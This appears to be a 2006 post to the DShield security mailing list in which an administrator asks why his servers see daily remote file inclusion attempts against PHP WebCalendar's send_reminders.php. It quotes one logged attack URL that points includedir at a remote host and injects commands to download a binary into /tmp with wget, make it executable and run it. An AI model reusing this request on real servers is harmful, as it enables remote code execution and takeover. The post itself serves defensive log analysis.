[Dshield] HTTP_PHP_Includedir

DigitalNation dshield at digitalnation.ca
Fri Mar 17 18:58:40 GMT 2006


Hi All,

We are seeing a lot of these cross scripting PHP attacks lately. Anyone else
see an increase? I know it is PHP WEB CALENDAR related. We do not run this
app, but still we see these scripts daily. What exactly are they looking
for?


<snip>

202.143.144.53, , 65.x.x.x, ,
URL=/webcalendar/tools/send_reminders.phpsend_reminders.php&arg=includedir%3
Dhttp://83.16.187.6/cmd.dat?%26cmd%3Dcd%2520/tmp;wget%252083.16.187.6/haita;
chmod%2520744%2520haita;./haita;echo%2520YYY;echo&server=65.x.x.x

</snip>

------------------
M. McBride
Security Admin
DigitalNation
Vancouver, Canada
 





More information about the list mailing list